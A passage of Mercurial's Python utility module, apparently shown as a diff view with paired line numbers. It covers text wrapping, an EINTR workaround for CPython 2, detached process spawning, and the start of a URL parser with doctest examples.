2453 return codecs.escape_decode(s)[0]
2449
2454
2450 def forcebytestr(obj):
2455 def forcebytestr(obj):
2451 """Portably format an arbitrary object (e.g. exception) into a byte
2456 """Portably format an arbitrary object (e.g. exception) into a byte
2452 string."""
2457 string."""
2453 try:
2458 try:
2454 return pycompat.bytestr(obj)
2459 return pycompat.bytestr(obj)
2455 except UnicodeEncodeError:
2460 except UnicodeEncodeError:
2456 # non-ascii string, may be lossy
2461 # non-ascii string, may be lossy
2457 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2462 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2458
2463
2459 def uirepr(s):
2464 def uirepr(s):
2460 # Avoid double backslash in Windows path repr()
2465 # Avoid double backslash in Windows path repr()
2461 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2466 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2462
2467
2463 # delay import of textwrap
2468 # delay import of textwrap
2464 def MBTextWrapper(**kwargs):
2469 def MBTextWrapper(**kwargs):
2465 class tw(textwrap.TextWrapper):
2470 class tw(textwrap.TextWrapper):
2466 """
2471 """
2467 Extend TextWrapper for width-awareness.
2472 Extend TextWrapper for width-awareness.
2468
2473
2469 Neither number of 'bytes' in any encoding nor 'characters' is
2474 Neither number of 'bytes' in any encoding nor 'characters' is
2470 appropriate to calculate terminal columns for specified string.
2475 appropriate to calculate terminal columns for specified string.
2471
2476
2472 Original TextWrapper implementation uses built-in 'len()' directly,
2477 Original TextWrapper implementation uses built-in 'len()' directly,
2473 so overriding is needed to use width information of each characters.
2478 so overriding is needed to use width information of each characters.
2474
2479
2475 In addition, characters classified into 'ambiguous' width are
2480 In addition, characters classified into 'ambiguous' width are
2476 treated as wide in East Asian area, but as narrow in other.
2481 treated as wide in East Asian area, but as narrow in other.
2477
2482
2478 This requires use decision to determine width of such characters.
2483 This requires use decision to determine width of such characters.
2479 """
2484 """
2480 def _cutdown(self, ucstr, space_left):
2485 def _cutdown(self, ucstr, space_left):
2481 l = 0
2486 l = 0
2482 colwidth = encoding.ucolwidth
2487 colwidth = encoding.ucolwidth
2483 for i in xrange(len(ucstr)):
2488 for i in xrange(len(ucstr)):
2484 l += colwidth(ucstr[i])
2489 l += colwidth(ucstr[i])
2485 if space_left < l:
2490 if space_left < l:
2486 return (ucstr[:i], ucstr[i:])
2491 return (ucstr[:i], ucstr[i:])
2487 return ucstr, ''
2492 return ucstr, ''
2488
2493
2489 # overriding of base class
2494 # overriding of base class
2490 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2495 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2491 space_left = max(width - cur_len, 1)
2496 space_left = max(width - cur_len, 1)
2492
2497
2493 if self.break_long_words:
2498 if self.break_long_words:
2494 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2499 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2495 cur_line.append(cut)
2500 cur_line.append(cut)
2496 reversed_chunks[-1] = res
2501 reversed_chunks[-1] = res
2497 elif not cur_line:
2502 elif not cur_line:
2498 cur_line.append(reversed_chunks.pop())
2503 cur_line.append(reversed_chunks.pop())
2499
2504
2500 # this overriding code is imported from TextWrapper of Python 2.6
2505 # this overriding code is imported from TextWrapper of Python 2.6
2501 # to calculate columns of string by 'encoding.ucolwidth()'
2506 # to calculate columns of string by 'encoding.ucolwidth()'
2502 def _wrap_chunks(self, chunks):
2507 def _wrap_chunks(self, chunks):
2503 colwidth = encoding.ucolwidth
2508 colwidth = encoding.ucolwidth
2504
2509
2505 lines = []
2510 lines = []
2506 if self.width <= 0:
2511 if self.width <= 0:
2507 raise ValueError("invalid width %r (must be > 0)" % self.width)
2512 raise ValueError("invalid width %r (must be > 0)" % self.width)
2508
2513
2509 # Arrange in reverse order so items can be efficiently popped
2514 # Arrange in reverse order so items can be efficiently popped
2510 # from a stack of chucks.
2515 # from a stack of chucks.
2511 chunks.reverse()
2516 chunks.reverse()
2512
2517
2513 while chunks:
2518 while chunks:
2514
2519
2515 # Start the list of chunks that will make up the current line.
2520 # Start the list of chunks that will make up the current line.
2516 # cur_len is just the length of all the chunks in cur_line.
2521 # cur_len is just the length of all the chunks in cur_line.
2517 cur_line = []
2522 cur_line = []
2518 cur_len = 0
2523 cur_len = 0
2519
2524
2520 # Figure out which static string will prefix this line.
2525 # Figure out which static string will prefix this line.
2521 if lines:
2526 if lines:
2522 indent = self.subsequent_indent
2527 indent = self.subsequent_indent
2523 else:
2528 else:
2524 indent = self.initial_indent
2529 indent = self.initial_indent
2525
2530
2526 # Maximum width for this line.
2531 # Maximum width for this line.
2527 width = self.width - len(indent)
2532 width = self.width - len(indent)
2528
2533
2529 # First chunk on line is whitespace -- drop it, unless this
2534 # First chunk on line is whitespace -- drop it, unless this
2530 # is the very beginning of the text (i.e. no lines started yet).
2535 # is the very beginning of the text (i.e. no lines started yet).
2531 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2536 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2532 del chunks[-1]
2537 del chunks[-1]
2533
2538
2534 while chunks:
2539 while chunks:
2535 l = colwidth(chunks[-1])
2540 l = colwidth(chunks[-1])
2536
2541
2537 # Can at least squeeze this chunk onto the current line.
2542 # Can at least squeeze this chunk onto the current line.
2538 if cur_len + l <= width:
2543 if cur_len + l <= width:
2539 cur_line.append(chunks.pop())
2544 cur_line.append(chunks.pop())
2540 cur_len += l
2545 cur_len += l
2541
2546
2542 # Nope, this line is full.
2547 # Nope, this line is full.
2543 else:
2548 else:
2544 break
2549 break
2545
2550
2546 # The current line is full, and the next chunk is too big to
2551 # The current line is full, and the next chunk is too big to
2547 # fit on *any* line (not just this one).
2552 # fit on *any* line (not just this one).
2548 if chunks and colwidth(chunks[-1]) > width:
2553 if chunks and colwidth(chunks[-1]) > width:
2549 self._handle_long_word(chunks, cur_line, cur_len, width)
2554 self._handle_long_word(chunks, cur_line, cur_len, width)
2550
2555
2551 # If the last chunk on this line is all whitespace, drop it.
2556 # If the last chunk on this line is all whitespace, drop it.
2552 if (self.drop_whitespace and
2557 if (self.drop_whitespace and
2553 cur_line and cur_line[-1].strip() == r''):
2558 cur_line and cur_line[-1].strip() == r''):
2554 del cur_line[-1]
2559 del cur_line[-1]
2555
2560
2556 # Convert current line back to a string and store it in list
2561 # Convert current line back to a string and store it in list
2557 # of all lines (return value).
2562 # of all lines (return value).
2558 if cur_line:
2563 if cur_line:
2559 lines.append(indent + r''.join(cur_line))
2564 lines.append(indent + r''.join(cur_line))
2560
2565
2561 return lines
2566 return lines
2562
2567
2563 global MBTextWrapper
2568 global MBTextWrapper
2564 MBTextWrapper = tw
2569 MBTextWrapper = tw
2565 return tw(**kwargs)
2570 return tw(**kwargs)
2566
2571
2567 def wrap(line, width, initindent='', hangindent=''):
2572 def wrap(line, width, initindent='', hangindent=''):
2568 maxindent = max(len(hangindent), len(initindent))
2573 maxindent = max(len(hangindent), len(initindent))
2569 if width <= maxindent:
2574 if width <= maxindent:
2570 # adjust for weird terminal size
2575 # adjust for weird terminal size
2571 width = max(78, maxindent + 1)
2576 width = max(78, maxindent + 1)
2572 line = line.decode(pycompat.sysstr(encoding.encoding),
2577 line = line.decode(pycompat.sysstr(encoding.encoding),
2573 pycompat.sysstr(encoding.encodingmode))
2578 pycompat.sysstr(encoding.encodingmode))
2574 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2579 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2575 pycompat.sysstr(encoding.encodingmode))
2580 pycompat.sysstr(encoding.encodingmode))
2576 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2581 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2577 pycompat.sysstr(encoding.encodingmode))
2582 pycompat.sysstr(encoding.encodingmode))
2578 wrapper = MBTextWrapper(width=width,
2583 wrapper = MBTextWrapper(width=width,
2579 initial_indent=initindent,
2584 initial_indent=initindent,
2580 subsequent_indent=hangindent)
2585 subsequent_indent=hangindent)
2581 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2586 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2582
2587
2583 if (pyplatform.python_implementation() == 'CPython' and
2588 if (pyplatform.python_implementation() == 'CPython' and
2584 sys.version_info < (3, 0)):
2589 sys.version_info < (3, 0)):
2585 # There is an issue in CPython that some IO methods do not handle EINTR
2590 # There is an issue in CPython that some IO methods do not handle EINTR
2586 # correctly. The following table shows what CPython version (and functions)
2591 # correctly. The following table shows what CPython version (and functions)
2587 # are affected (buggy: has the EINTR bug, okay: otherwise):
2592 # are affected (buggy: has the EINTR bug, okay: otherwise):
2588 #
2593 #
2589 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2594 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2590 # --------------------------------------------------
2595 # --------------------------------------------------
2591 # fp.__iter__ | buggy | buggy | okay
2596 # fp.__iter__ | buggy | buggy | okay
2592 # fp.read* | buggy | okay [1] | okay
2597 # fp.read* | buggy | okay [1] | okay
2593 #
2598 #
2594 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2599 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2595 #
2600 #
2596 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2601 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2597 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2602 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2598 #
2603 #
2599 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2604 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2600 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2605 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2601 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2606 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2602 # fp.__iter__ but not other fp.read* methods.
2607 # fp.__iter__ but not other fp.read* methods.
2603 #
2608 #
2604 # On modern systems like Linux, the "read" syscall cannot be interrupted
2609 # On modern systems like Linux, the "read" syscall cannot be interrupted
2605 # when reading "fast" files like on-disk files. So the EINTR issue only
2610 # when reading "fast" files like on-disk files. So the EINTR issue only
2606 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2611 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2607 # files approximately as "fast" files and use the fast (unsafe) code path,
2612 # files approximately as "fast" files and use the fast (unsafe) code path,
2608 # to minimize the performance impact.
2613 # to minimize the performance impact.
2609 if sys.version_info >= (2, 7, 4):
2614 if sys.version_info >= (2, 7, 4):
2610 # fp.readline deals with EINTR correctly, use it as a workaround.
2615 # fp.readline deals with EINTR correctly, use it as a workaround.
2611 def _safeiterfile(fp):
2616 def _safeiterfile(fp):
2612 return iter(fp.readline, '')
2617 return iter(fp.readline, '')
2613 else:
2618 else:
2614 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2619 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2615 # note: this may block longer than necessary because of bufsize.
2620 # note: this may block longer than necessary because of bufsize.
2616 def _safeiterfile(fp, bufsize=4096):
2621 def _safeiterfile(fp, bufsize=4096):
2617 fd = fp.fileno()
2622 fd = fp.fileno()
2618 line = ''
2623 line = ''
2619 while True:
2624 while True:
2620 try:
2625 try:
2621 buf = os.read(fd, bufsize)
2626 buf = os.read(fd, bufsize)
2622 except OSError as ex:
2627 except OSError as ex:
2623 # os.read only raises EINTR before any data is read
2628 # os.read only raises EINTR before any data is read
2624 if ex.errno == errno.EINTR:
2629 if ex.errno == errno.EINTR:
2625 continue
2630 continue
2626 else:
2631 else:
2627 raise
2632 raise
2628 line += buf
2633 line += buf
2629 if '\n' in buf:
2634 if '\n' in buf:
2630 splitted = line.splitlines(True)
2635 splitted = line.splitlines(True)
2631 line = ''
2636 line = ''
2632 for l in splitted:
2637 for l in splitted:
2633 if l[-1] == '\n':
2638 if l[-1] == '\n':
2634 yield l
2639 yield l
2635 else:
2640 else:
2636 line = l
2641 line = l
2637 if not buf:
2642 if not buf:
2638 break
2643 break
2639 if line:
2644 if line:
2640 yield line
2645 yield line
2641
2646
2642 def iterfile(fp):
2647 def iterfile(fp):
2643 fastpath = True
2648 fastpath = True
2644 if type(fp) is file:
2649 if type(fp) is file:
2645 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2650 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2646 if fastpath:
2651 if fastpath:
2647 return fp
2652 return fp
2648 else:
2653 else:
2649 return _safeiterfile(fp)
2654 return _safeiterfile(fp)
2650 else:
2655 else:
2651 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2656 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2652 def iterfile(fp):
2657 def iterfile(fp):
2653 return fp
2658 return fp
2654
2659
2655 def iterlines(iterator):
2660 def iterlines(iterator):
2656 for chunk in iterator:
2661 for chunk in iterator:
2657 for line in chunk.splitlines():
2662 for line in chunk.splitlines():
2658 yield line
2663 yield line
2659
2664
2660 def expandpath(path):
2665 def expandpath(path):
2661 return os.path.expanduser(os.path.expandvars(path))
2666 return os.path.expanduser(os.path.expandvars(path))
2662
2667
2663 def hgcmd():
2668 def hgcmd():
2664 """Return the command used to execute current hg
2669 """Return the command used to execute current hg
2665
2670
2666 This is different from hgexecutable() because on Windows we want
2671 This is different from hgexecutable() because on Windows we want
2667 to avoid things opening new shell windows like batch files, so we
2672 to avoid things opening new shell windows like batch files, so we
2668 get either the python call or current executable.
2673 get either the python call or current executable.
2669 """
2674 """
2670 if mainfrozen():
2675 if mainfrozen():
2671 if getattr(sys, 'frozen', None) == 'macosx_app':
2676 if getattr(sys, 'frozen', None) == 'macosx_app':
2672 # Env variable set by py2app
2677 # Env variable set by py2app
2673 return [encoding.environ['EXECUTABLEPATH']]
2678 return [encoding.environ['EXECUTABLEPATH']]
2674 else:
2679 else:
2675 return [pycompat.sysexecutable]
2680 return [pycompat.sysexecutable]
2676 return gethgcmd()
2681 return gethgcmd()
2677
2682
2678 def rundetached(args, condfn):
2683 def rundetached(args, condfn):
2679 """Execute the argument list in a detached process.
2684 """Execute the argument list in a detached process.
2680
2685
2681 condfn is a callable which is called repeatedly and should return
2686 condfn is a callable which is called repeatedly and should return
2682 True once the child process is known to have started successfully.
2687 True once the child process is known to have started successfully.
2683 At this point, the child process PID is returned. If the child
2688 At this point, the child process PID is returned. If the child
2684 process fails to start or finishes before condfn() evaluates to
2689 process fails to start or finishes before condfn() evaluates to
2685 True, return -1.
2690 True, return -1.
2686 """
2691 """
2687 # Windows case is easier because the child process is either
2692 # Windows case is easier because the child process is either
2688 # successfully starting and validating the condition or exiting
2693 # successfully starting and validating the condition or exiting
2689 # on failure. We just poll on its PID. On Unix, if the child
2694 # on failure. We just poll on its PID. On Unix, if the child
2690 # process fails to start, it will be left in a zombie state until
2695 # process fails to start, it will be left in a zombie state until
2691 # the parent wait on it, which we cannot do since we expect a long
2696 # the parent wait on it, which we cannot do since we expect a long
2692 # running process on success. Instead we listen for SIGCHLD telling
2697 # running process on success. Instead we listen for SIGCHLD telling
2693 # us our child process terminated.
2698 # us our child process terminated.
2694 terminated = set()
2699 terminated = set()
2695 def handler(signum, frame):
2700 def handler(signum, frame):
2696 terminated.add(os.wait())
2701 terminated.add(os.wait())
2697 prevhandler = None
2702 prevhandler = None
2698 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2703 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2699 if SIGCHLD is not None:
2704 if SIGCHLD is not None:
2700 prevhandler = signal.signal(SIGCHLD, handler)
2705 prevhandler = signal.signal(SIGCHLD, handler)
2701 try:
2706 try:
2702 pid = spawndetached(args)
2707 pid = spawndetached(args)
2703 while not condfn():
2708 while not condfn():
2704 if ((pid in terminated or not testpid(pid))
2709 if ((pid in terminated or not testpid(pid))
2705 and not condfn()):
2710 and not condfn()):
2706 return -1
2711 return -1
2707 time.sleep(0.1)
2712 time.sleep(0.1)
2708 return pid
2713 return pid
2709 finally:
2714 finally:
2710 if prevhandler is not None:
2715 if prevhandler is not None:
2711 signal.signal(signal.SIGCHLD, prevhandler)
2716 signal.signal(signal.SIGCHLD, prevhandler)
2712
2717
2713 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2718 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2714 """Return the result of interpolating items in the mapping into string s.
2719 """Return the result of interpolating items in the mapping into string s.
2715
2720
2716 prefix is a single character string, or a two character string with
2721 prefix is a single character string, or a two character string with
2717 a backslash as the first character if the prefix needs to be escaped in
2722 a backslash as the first character if the prefix needs to be escaped in
2718 a regular expression.
2723 a regular expression.
2719
2724
2720 fn is an optional function that will be applied to the replacement text
2725 fn is an optional function that will be applied to the replacement text
2721 just before replacement.
2726 just before replacement.
2722
2727
2723 escape_prefix is an optional flag that allows using doubled prefix for
2728 escape_prefix is an optional flag that allows using doubled prefix for
2724 its escaping.
2729 its escaping.
2725 """
2730 """
2726 fn = fn or (lambda s: s)
2731 fn = fn or (lambda s: s)
2727 patterns = '|'.join(mapping.keys())
2732 patterns = '|'.join(mapping.keys())
2728 if escape_prefix:
2733 if escape_prefix:
2729 patterns += '|' + prefix
2734 patterns += '|' + prefix
2730 if len(prefix) > 1:
2735 if len(prefix) > 1:
2731 prefix_char = prefix[1:]
2736 prefix_char = prefix[1:]
2732 else:
2737 else:
2733 prefix_char = prefix
2738 prefix_char = prefix
2734 mapping[prefix_char] = prefix_char
2739 mapping[prefix_char] = prefix_char
2735 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2740 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2736 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2741 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2737
2742
2738 def getport(port):
2743 def getport(port):
2739 """Return the port for a given network service.
2744 """Return the port for a given network service.
2740
2745
2741 If port is an integer, it's returned as is. If it's a string, it's
2746 If port is an integer, it's returned as is. If it's a string, it's
2742 looked up using socket.getservbyname(). If there's no matching
2747 looked up using socket.getservbyname(). If there's no matching
2743 service, error.Abort is raised.
2748 service, error.Abort is raised.
2744 """
2749 """
2745 try:
2750 try:
2746 return int(port)
2751 return int(port)
2747 except ValueError:
2752 except ValueError:
2748 pass
2753 pass
2749
2754
2750 try:
2755 try:
2751 return socket.getservbyname(pycompat.sysstr(port))
2756 return socket.getservbyname(pycompat.sysstr(port))
2752 except socket.error:
2757 except socket.error:
2753 raise Abort(_("no port number associated with service '%s'") % port)
2758 raise Abort(_("no port number associated with service '%s'") % port)
2754
2759
2755 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2760 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2756 '0': False, 'no': False, 'false': False, 'off': False,
2761 '0': False, 'no': False, 'false': False, 'off': False,
2757 'never': False}
2762 'never': False}
2758
2763
2759 def parsebool(s):
2764 def parsebool(s):
2760 """Parse s into a boolean.
2765 """Parse s into a boolean.
2761
2766
2762 If s is not a valid boolean, returns None.
2767 If s is not a valid boolean, returns None.
2763 """
2768 """
2764 return _booleans.get(s.lower(), None)
2769 return _booleans.get(s.lower(), None)
2765
2770
2766 _hextochr = dict((a + b, chr(int(a + b, 16)))
2771 _hextochr = dict((a + b, chr(int(a + b, 16)))
2767 for a in string.hexdigits for b in string.hexdigits)
2772 for a in string.hexdigits for b in string.hexdigits)
2768
2773
2769 class url(object):
2774 class url(object):
2770 r"""Reliable URL parser.
2775 r"""Reliable URL parser.
2771
2776
2772 This parses URLs and provides attributes for the following
2777 This parses URLs and provides attributes for the following
2773 components:
2778 components:
2774
2779
2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2780 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2776
2781
2777 Missing components are set to None. The only exception is
2782 Missing components are set to None. The only exception is
2778 fragment, which is set to '' if present but empty.
2783 fragment, which is set to '' if present but empty.
2779
2784
2780 If parsefragment is False, fragment is included in query. If
2785 If parsefragment is False, fragment is included in query. If
2781 parsequery is False, query is included in path. If both are
2786 parsequery is False, query is included in path. If both are
2782 False, both fragment and query are included in path.
2787 False, both fragment and query are included in path.
2783
2788
2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2789 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2785
2790
2786 Note that for backward compatibility reasons, bundle URLs do not
2791 Note that for backward compatibility reasons, bundle URLs do not
2787 take host names. That means 'bundle://../' has a path of '../'.
2792 take host names. That means 'bundle://../' has a path of '../'.
2788
2793
2789 Examples:
2794 Examples:
2790
2795
2791 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2796 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2792 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2797 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2793 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2798 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2794 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2799 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2795 >>> url(b'file:///home/joe/repo')
2800 >>> url(b'file:///home/joe/repo')
2796 <url scheme: 'file', path: '/home/joe/repo'>
2801 <url scheme: 'file', path: '/home/joe/repo'>
2797 >>> url(b'file:///c:/temp/foo/')
2802 >>> url(b'file:///c:/temp/foo/')
2798 <url scheme: 'file', path: 'c:/temp/foo/'>
2803 <url scheme: 'file', path: 'c:/temp/foo/'>
2799 >>> url(b'bundle:foo')
2804 >>> url(b'bundle:foo')
2800 <url scheme: 'bundle', path: 'foo'>
2805 <url scheme: 'bundle', path: 'foo'>
2801 >>> url(b'bundle://../foo')
2806 >>> url(b'bundle://../foo')
2802 <url scheme: 'bundle', path: '../foo'>
2807 <url scheme: 'bundle', path: '../foo'>
2803 >>> url(br'c:\foo\bar')
2808 >>> url(br'c:\foo\bar')
2804 <url path: 'c:\\foo\\bar'>
2809 <url path: 'c:\\foo\\bar'>
2805 >>> url(br'\\blah\blah\blah')
2810 >>> url(br'\\blah\blah\blah')
2806 <url path: '\\\\blah\\blah\\blah'>
2811 <url path: '\\\\blah\\blah\\blah'>
2807 >>> url(br'\\blah\blah\blah#baz')
2812 >>> url(br'\\blah\blah\blah#baz')
2808 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2813 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2809 >>> url(br'file:///C:\users\me')
2814 >>> url(br'file:///C:\users\me')
2810 <url scheme: 'file', path: 'C:\\users\\me'>
2815 <url scheme: 'file', path: 'C:\\users\\me'>
2811
2816
2812 Authentication credentials:
2817 Authentication credentials:
2813
2818
2814 >>> url(b'ssh://joe:xyz@x/repo')
2819 >>> url(b'ssh://joe:xyz@x/repo')
2815 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2820 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2816 >>> url(b'ssh://joe@x/repo')
2821 >>> url(b'ssh://joe@x/repo')
2817 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2822 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2818
2823
2819 Query strings and fragments:
2824 Query strings and fragments:
2820
2825
2821 >>> url(b'http://host/a?b#c')
2826 >>> url(b'http://host/a?b#c')
2822 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2827 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2823 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2828 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2824 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2829 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2825
2830
2826 Empty path:
2831 Empty path:
2827
2832
2828 >>> url(b'')
2833 >>> url(b'')
2829 <url path: ''>
2834 <url path: ''>
2830 >>> url(b'#a')
2835 >>> url(b'#a')
2831 <url path: '', fragment: 'a'>
2836 <url path: '', fragment: 'a'>
2832 >>> url(b'http://host/')
2837 >>> url(b'http://host/')
2833 <url scheme: 'http', host: 'host', path: ''>
2838 <url scheme: 'http', host: 'host', path: ''>
2834 >>> url(b'http://host/#a')
2839 >>> url(b'http://host/#a')
2835 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2840 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2836
2841
2837 Only scheme:
2842 Only scheme:
2838
2843
2839 >>> url(b'http:')
2844 >>> url(b'http:')
2840 <url scheme: 'http'>
2845 <url scheme: 'http'>
2841 """
2846 """
2842
2847
2843 _safechars = "!~*'()+"
2848 _safechars = "!~*'()+"
2844 _safepchars = "/!~*'()+:\\"
2849 _safepchars = "/!~*'()+:\\"
2845 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2850 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2846
2851
2847 def __init__(self, path, parsequery=True, parsefragment=True):
2852 def __init__(self, path, parsequery=True, parsefragment=True):
2848 # We slowly chomp away at path until we have only the path left
2853 # We slowly chomp away at path until we have only the path left
2849 self.scheme = self.user = self.passwd = self.host = None
2854 self.scheme = self.user = self.passwd = self.host = None
2850 self.port = self.path = self.query = self.fragment = None
2855 self.port = self.path = self.query = self.fragment = None
2851 self._localpath = True
2856 self._localpath = True
2852 self._hostport = ''
2857 self._hostport = ''
2853 self._origpath = path
2858 self._origpath = path
2854
2859
2855 if parsefragment and '#' in path:
2860 if parsefragment and '#' in path:
2856 path, self.fragment = path.split('#', 1)
2861 path, self.fragment = path.split('#', 1)
2857
2862
2858 # special case for Windows drive letters and UNC paths
2863 # special case for Windows drive letters and UNC paths
2859 if hasdriveletter(path) or path.startswith('\\\\'):
2864 if hasdriveletter(path) or path.startswith('\\\\'):
2860 self.path = path
2865 self.path = path
2861 return
2866 return
2862
2867
2863 # For compatibility reasons, we can't handle bundle paths as
2868 # For compatibility reasons, we can't handle bundle paths as
2864 # normal URLS
2869 # normal URLS
2865 if path.startswith('bundle:'):
2870 if path.startswith('bundle:'):
2866 self.scheme = 'bundle'
2871 self.scheme = 'bundle'
2867 path = path[7:]
2872 path = path[7:]
2868 if path.startswith('//'):
2873 if path.startswith('//'):
2869 path = path[2:]
2874 path = path[2:]
2870 self.path = path
2875 self.path = path
2871 return
2876 return
2872
2877
2873 if self._matchscheme(path):
2878 if self._matchscheme(path):
2874 parts = path.split(':', 1)
2879 parts = path.split(':', 1)
2875 if parts[0]:
2880 if parts[0]:
2876 self.scheme, path = parts
2881 self.scheme, path = parts
2877 self._localpath = False
2882 self._localpath = False
2878
2883
2879 if not path:
2884 if not path:
2880 path = None
2885 path = None
2881 if self._localpath:
2886 if self._localpath:
2882 self.path = ''
2887 self.path = ''
2883 return
2888 return
2884 else:
2889 else:
2885 if self._localpath:
2890 if self._localpath:
2886 self.path = path
2891 self.path = path
2887 return
2892 return
2888
2893
2889 if parsequery and '?' in path:
2894 if parsequery and '?' in path:
2890 path, self.query = path.split('?', 1)
2895 path, self.query = path.split('?', 1)
2891 if not path:
2896 if not path:
2892 path = None
2897 path = None
2893 if not self.query:
2898 if not self.query:
2894 self.query = None
2899 self.query = None
2895
2900
2896 # // is required to specify a host/authority
2901 # // is required to specify a host/authority
2897 if path and path.startswith('//'):
2902 if path and path.startswith('//'):
2898 parts = path[2:].split('/', 1)
2903 parts = path[2:].split('/', 1)
2899 if len(parts) > 1:
2904 if len(parts) > 1:
2900 self.host, path = parts
2905 self.host, path = parts
2901 else:
2906 else:
2902 self.host = parts[0]
2907 self.host = parts[0]
2903 path = None
2908 path = None
2904 if not self.host:
2909 if not self.host:
2905 self.host = None
2910 self.host = None
2906 # path of file:///d is /d
2911 # path of file:///d is /d
2907 # path of file:///d:/ is d:/, not /d:/
2912 # path of file:///d:/ is d:/, not /d:/
2908 if path and not hasdriveletter(path):
2913 if path and not hasdriveletter(path):
2909 path = '/' + path
2914 path = '/' + path
2910
2915
2911 if self.host and '@' in self.host:
2916 if self.host and '@' in self.host:
2912 self.user, self.host = self.host.rsplit('@', 1)
2917 self.user, self.host = self.host.rsplit('@', 1)
2913 if ':' in self.user:
2918 if ':' in self.user:
2914 self.user, self.passwd = self.user.split(':', 1)
2919 self.user, self.passwd = self.user.split(':', 1)
2915 if not self.host:
2920 if not self.host:
2916 self.host = None
2921 self.host = None
2917
2922
2918 # Don't split on colons in IPv6 addresses without ports
2923 # Don't split on colons in IPv6 addresses without ports
2919 if (self.host and ':' in self.host and
2924 if (self.host and ':' in self.host and
2920 not (self.host.startswith('[') and self.host.endswith(']'))):
2925 not (self.host.startswith('[') and self.host.endswith(']'))):
2921 self._hostport = self.host
2926 self._hostport = self.host
2922 self.host, self.port = self.host.rsplit(':', 1)
2927 self.host, self.port = self.host.rsplit(':', 1)
2923 if not self.host:
2928 if not self.host:
2924 self.host = None
2929 self.host = None
2925
2930
2926 if (self.host and self.scheme == 'file' and
2931 if (self.host and self.scheme == 'file' and
2927 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2932 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2928 raise Abort(_('file:// URLs can only refer to localhost'))
2933 raise Abort(_('file:// URLs can only refer to localhost'))
2929
2934
2930 self.path = path
2935 self.path = path
2931
2936
2932 # leave the query string escaped
